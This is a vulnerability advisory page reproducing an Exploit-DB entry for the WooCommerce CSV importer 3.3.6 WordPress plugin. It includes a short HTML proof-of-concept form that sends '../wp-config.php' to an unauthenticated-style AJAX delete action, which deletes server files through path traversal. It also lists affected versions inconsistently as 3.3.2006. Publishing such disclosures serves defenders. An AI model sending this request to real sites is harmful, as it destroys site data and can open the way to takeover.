Plugin Woocommerce CSV importer 3.3.6 – RCE

vendor:

CSV importer

by:

Lenon Leite

7.5

CVSS

HIGH

RCE (Remote Code Execution)

CWE

Product Name: CSV importer

Affected Version From: 3.3.2006

Affected Version To: 3.3.2006

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 16.1

2018

Plugin Woocommerce CSV importer 3.3.6 – RCE – Unlink

The plugin Woocommerce CSV importer 3.3.6 allows any registered user to perform remote code execution. The vulnerability exists due to the lack of escaping in the $_POST['filename'] parameter. By sending a specially crafted request to the admin-ajax.php file, an attacker can unlink files on the server.

Mitigation:

The vendor has not provided any mitigation or remediation for this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title:  Plugin Woocommerce CSV importer 3.3.6 – RCE – Unlink
# Date: 08/04/2018
# Exploit Author: Lenon Leite
# Vendor Homepage: *https://wordpress.org/plugins/woocommerce-csvimport/
# Software Link: *https://wordpress.org/plugins/woocommerce-csvimport/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 3.3.6
# Tested on: Ubuntu 16.1
#

1 - Description

   - Type user access: any user registered.
   - $_POST['filename'] is not escaped.

2. Proof of Concept

<form method="post"
   action="http://target/wp-admin/admin-ajax.php?action=delete_export_file">
   <input type="text" name="filename" value="../wp-config.php">
   <input type="submit">
</form>


   - Date Discovery : *11/23/2017*
   - Date Vendor Contact : *12/29/2017*
   - Date Publish : 08/04/2018
   - Date Resolution :

 
#*Atenciosamente*
#
#*Lenon Leite*